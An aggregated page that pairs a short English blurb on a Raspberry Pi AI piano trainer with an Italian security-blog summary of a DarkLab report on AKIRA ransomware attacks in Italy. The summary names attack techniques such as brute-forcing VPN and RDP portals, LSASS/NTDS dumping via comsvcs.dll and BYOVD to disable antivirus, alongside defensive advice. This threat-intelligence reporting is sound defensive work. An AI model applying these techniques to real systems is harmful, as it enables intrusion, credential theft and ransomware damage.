Using the piano training has the model run on a laptop and only has a Raspberry Pi for video, and gives instant feedback to the pianist due to the demands of the model. Placing the Pi and an LCD screen for feedback into a simple enclosure allows the easy viewing of how good an AI model thinks you play piano. [Ada López] demos their device by playing Twinkle Twinkle Little Star but there is no reason why other songs couldn’t be added!

While there are simpler piano trainers out there relying on audio cues, this project presents a great opportunity for a fun project for anyone else wanting to take up the baton. If you want to get a little more from having to do less in the physical space, then this invisible piano is perfect for you!

hackaday.com/2025/06/22/ai-pia…

La primavera 2025 verrà ricordata come un punto di svolta nella cronaca cyber del nostro Paese. Mentre si susseguono bollettini e comunicati tecnici, un dato emerge in modo lampante: AKIRA è entrato pesantemente in scena nel panorama italiano. E lo ha fatto senza bussare alla porta.

Nel report che pubblichiamo oggi, frutto del lavoro congiunto della nostra community e del sottogruppo DarkLab, specializzato in Cyber Threat Intelligence. Analisi con un taglio tecnico ma operativo sulla nuova campagna offensiva di AKIRA, il ransomware-as-a-service che si è fatto le ossa all’estero ed ora gioca in casa colpendo grandi e medie aziende lungo tutto lo stivale, con una particolare predilezione per il Nord-Est.

Target: l’Italia sotto attacco

Il report prende vita dalla crescente evidenza di un pattern: sempre più organizzazioni italiane, in settori differenti, vengono colpite da attacchi silenziosi, efficaci e rapidissimi. Non c’è phishing, non ci sono exploit zero-day da film hollywoodiano. C’è invece un’elevata automazione, tecniche consolidate e una strategia di accesso iniziale che sfrutta le debolezze delle nostre reti perimetrali. A colpire è proprio questo: la banalità del male informatico.

Il ruolo di BRUTED: uno strumento, più attori

Un aspetto cruciale del report è l’analisi dell’impiego del tool BRUTED, sviluppato originariamente da BlackBasta ed ora riutilizzato da affiliati AKIRA. Questo strumento automatizza la scoperta e il brute-forcing su dispositivi perimetrali come VPN, portali RDP e appliance SSL utilizzando tecniche evolute e proxy SOCKS5 per coprirne le tracce.

Le evidenze raccolte includono IP legati storicamente a infrastrutture malevole, come quelli appartenenti ad AS43350 (NFORCE, Paesi Bassi), già citati da CISA. E, sorpresa: tutto porta a credere che BlackBasta, Akira e (forse) Cactus stiano condividendo non solo strumenti, ma anche TTPs.

L’impatto: in meno di 24 ore dal primo accesso all’esfiltrazione

Gli attacchi Akira si sviluppano con una velocità brutale. Meno di 24 ore separano il primo accesso all’infrastruttura dal furto di dati, crittografia massiva e distruzione dei backup. Uno scenario da incubo in cui ogni secondo conta e la mancanza di segmentazione o protezione efficace fa la differenza tra resistere o cadere.

Tra gli strumenti documentati nel report troviamo anche SharpHound, RClone, WinRAR, l’abuso della comsvcs.dll per dump di LSASS/NTDS e tecniche BYOVD per disattivare AV ed EDR. Una sinfonia di TTPs da manuale MITRE ATT&CK.

Per la difesa serve un cambio di passo

Il report si chiude con un corposo elenco di azioni concrete: dal patch management agli honeypot, dal monitoraggio Sysmon al controllo granularizzato tramite AppLocker e WDAC. La chiave non è reagire, ma anticipare.

E ancora: tiered administration per AD, gestione Just-in-Time dei privilegi, backup off-site realmente protetti, simulazioni di risposta incidentale. Il tutto con un monito chiaro: Akira non sceglie le sue vittime in base al fatturato o alla dimensione, ma in base all’esposizione.

Abbiamo messo nero su bianco quanto scoperto: tecniche, IoC, tattiche, strumenti. Il documento è pensato per chi lavora sul campo, per i blue team, per i CISO e per tutti coloro che si trovano oggi a dover gestire una minaccia concreta. Non è un paper da convegno: è una guida per chi deve difendere la trincea.

La conclusione non è (solo) tecnologia, è consapevolezza.

Non si tratta più solo di aggiornare i firewall o abilitare l’MFA. Serve un cambio di cultura: pensare da bersaglio, difendersi come fortezza, reagire come incident responder.

Il tempo delle policy scritte nei cassetti è finito. Con AKIRA alle porte, serve sangue freddo, logica, collaborazione. E magari anche un po’ di quella rabbia costruttiva che ci ha portati a scrivere questo report.

DarkLab è qui. E non molla.

L'articolo Emergenza Ransomware AKIRA in Italia. Il report di DarkLab su strumenti, impatti e mitigazioni proviene da il blog della sicurezza informatica.